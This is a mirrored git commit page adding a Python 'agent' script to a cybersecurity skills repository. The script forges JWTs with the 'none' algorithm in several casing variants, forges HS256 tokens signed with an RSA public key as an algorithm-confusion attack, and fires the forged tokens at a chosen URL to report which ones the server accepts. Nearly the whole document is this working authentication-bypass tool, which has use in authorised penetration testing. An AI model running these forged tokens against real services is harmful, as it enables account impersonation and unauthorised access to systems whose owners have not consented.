mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-13 14:44:58 +03:00
Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills - Update all 648 LICENSE files: copyright now reads 'Mahipal' - Add implementing-security-monitoring-with-datadog (new skill with full anatomy) - All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
This commit is contained in:
@@ -0,0 +1,161 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Agent for performing JWT 'none' algorithm attack testing."""
|
||||
|
||||
import json
|
||||
import argparse
|
||||
import base64
|
||||
import hmac
|
||||
import hashlib
|
||||
from datetime import datetime
|
||||
|
||||
|
||||
def b64url_encode(data):
|
||||
"""Base64url encode bytes."""
|
||||
return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
|
||||
|
||||
|
||||
def b64url_decode(s):
|
||||
"""Base64url decode string."""
|
||||
s += "=" * (4 - len(s) % 4)
|
||||
return base64.urlsafe_b64decode(s)
|
||||
|
||||
|
||||
def decode_jwt(token):
|
||||
"""Decode and display JWT components without verification."""
|
||||
parts = token.split(".")
|
||||
if len(parts) not in (2, 3):
|
||||
return {"error": "Invalid JWT format — expected 2 or 3 parts"}
|
||||
header = json.loads(b64url_decode(parts[0]))
|
||||
payload = json.loads(b64url_decode(parts[1]))
|
||||
signature = parts[2] if len(parts) == 3 else ""
|
||||
vuln_checks = {
|
||||
"alg_none_in_header": header.get("alg", "").lower() in ("none", ""),
|
||||
"alg_symmetric": header.get("alg", "").startswith("HS"),
|
||||
"no_expiry": "exp" not in payload,
|
||||
"expired": payload.get("exp", float("inf")) < datetime.utcnow().timestamp() if "exp" in payload else False,
|
||||
"no_issuer": "iss" not in payload,
|
||||
}
|
||||
return {"header": header, "payload": payload, "signature_present": bool(signature), "vulnerability_checks": vuln_checks}
|
||||
|
||||
|
||||
def forge_none_token(token, modify_claims=None):
|
||||
"""Forge a JWT with 'none' algorithm (removes signature)."""
|
||||
parts = token.split(".")
|
||||
payload = json.loads(b64url_decode(parts[0]))
|
||||
claims = json.loads(b64url_decode(parts[1]))
|
||||
if modify_claims:
|
||||
claims.update(modify_claims)
|
||||
none_header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
|
||||
new_payload = b64url_encode(json.dumps(claims).encode())
|
||||
variants = [
|
||||
{"name": "alg_none", "token": f"{none_header}.{new_payload}."},
|
||||
{"name": "alg_None", "token": f"{b64url_encode(json.dumps({'alg': 'None', 'typ': 'JWT'}).encode())}.{new_payload}."},
|
||||
{"name": "alg_NONE", "token": f"{b64url_encode(json.dumps({'alg': 'NONE', 'typ': 'JWT'}).encode())}.{new_payload}."},
|
||||
{"name": "alg_nOnE", "token": f"{b64url_encode(json.dumps({'alg': 'nOnE', 'typ': 'JWT'}).encode())}.{new_payload}."},
|
||||
{"name": "empty_sig", "token": f"{none_header}.{new_payload}"},
|
||||
{"name": "no_dot", "token": f"{none_header}.{new_payload}"},
|
||||
]
|
||||
return {
|
||||
"original_claims": json.loads(b64url_decode(parts[1])),
|
||||
"modified_claims": claims,
|
||||
"forged_tokens": variants,
|
||||
}
|
||||
|
||||
|
||||
def test_alg_confusion(token, public_key_file=None):
|
||||
"""Test algorithm confusion (RS256 -> HS256 using public key as HMAC secret)."""
|
||||
parts = token.split(".")
|
||||
header = json.loads(b64url_decode(parts[0]))
|
||||
claims = json.loads(b64url_decode(parts[1]))
|
||||
results = {"original_alg": header.get("alg"), "tests": []}
|
||||
if public_key_file:
|
||||
try:
|
||||
pubkey = open(public_key_file, "rb").read()
|
||||
hs256_header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
|
||||
payload_b64 = b64url_encode(json.dumps(claims).encode())
|
||||
signing_input = f"{hs256_header}.{payload_b64}".encode()
|
||||
signature = b64url_encode(hmac.new(pubkey, signing_input, hashlib.sha256).digest())
|
||||
results["tests"].append({
|
||||
"name": "RS256_to_HS256_confusion",
|
||||
"forged_token": f"{hs256_header}.{payload_b64}.{signature}",
|
||||
"description": "Uses RSA public key as HMAC-SHA256 secret",
|
||||
})
|
||||
except Exception as e:
|
||||
results["tests"].append({"name": "RS256_to_HS256_confusion", "error": str(e)})
|
||||
none_header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
|
||||
payload_b64 = b64url_encode(json.dumps(claims).encode())
|
||||
results["tests"].append({
|
||||
"name": "alg_none_downgrade",
|
||||
"forged_token": f"{none_header}.{payload_b64}.",
|
||||
"description": "Downgrade to 'none' algorithm — removes signature",
|
||||
})
|
||||
return results
|
||||
|
||||
|
||||
def test_jwt_endpoint(url, original_token, forged_tokens, headers=None):
|
||||
"""Test forged JWTs against a target endpoint."""
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
return {"error": "requests not installed"}
|
||||
hdrs = headers or {}
|
||||
results = []
|
||||
for ft in forged_tokens:
|
||||
test_headers = {**hdrs, "Authorization": f"Bearer {ft['token']}"}
|
||||
try:
|
||||
resp = requests.get(url, headers=test_headers, timeout=10)
|
||||
accepted = resp.status_code in (200, 201, 204)
|
||||
results.append({
|
||||
"variant": ft["name"], "status": resp.status_code,
|
||||
"accepted": accepted, "body_snippet": resp.text[:200],
|
||||
})
|
||||
except Exception as e:
|
||||
results.append({"variant": ft["name"], "error": str(e)})
|
||||
orig_resp = None
|
||||
try:
|
||||
resp = requests.get(url, headers={**hdrs, "Authorization": f"Bearer {original_token}"}, timeout=10)
|
||||
orig_resp = {"status": resp.status_code, "body_length": len(resp.text)}
|
||||
except Exception:
|
||||
pass
|
||||
vulnerable = [r for r in results if r.get("accepted")]
|
||||
return {
|
||||
"url": url, "original_response": orig_resp,
|
||||
"tests": results, "vulnerable_variants": len(vulnerable),
|
||||
"finding": "JWT_NONE_VULNERABLE" if vulnerable else "JWT_NONE_REJECTED",
|
||||
"severity": "CRITICAL" if vulnerable else "INFO",
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="JWT None Algorithm Attack Agent")
|
||||
sub = parser.add_subparsers(dest="command")
|
||||
d = sub.add_parser("decode", help="Decode JWT token")
|
||||
d.add_argument("--token", required=True)
|
||||
f = sub.add_parser("forge", help="Forge none-algorithm token")
|
||||
f.add_argument("--token", required=True)
|
||||
f.add_argument("--claims", help="JSON claims to modify")
|
||||
c = sub.add_parser("confuse", help="Test algorithm confusion")
|
||||
c.add_argument("--token", required=True)
|
||||
c.add_argument("--pubkey", help="RSA public key file for HS256 confusion")
|
||||
t = sub.add_parser("test", help="Test forged tokens against endpoint")
|
||||
t.add_argument("--url", required=True)
|
||||
t.add_argument("--token", required=True)
|
||||
args = parser.parse_args()
|
||||
if args.command == "decode":
|
||||
result = decode_jwt(args.token)
|
||||
elif args.command == "forge":
|
||||
claims = json.loads(args.claims) if args.claims else None
|
||||
result = forge_none_token(args.token, claims)
|
||||
elif args.command == "confuse":
|
||||
result = test_alg_confusion(args.token, args.pubkey)
|
||||
elif args.command == "test":
|
||||
forged = forge_none_token(args.token)
|
||||
result = test_jwt_endpoint(args.url, args.token, forged["forged_tokens"])
|
||||
else:
|
||||
parser.print_help()
|
||||
return
|
||||
print(json.dumps(result, indent=2, default=str))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user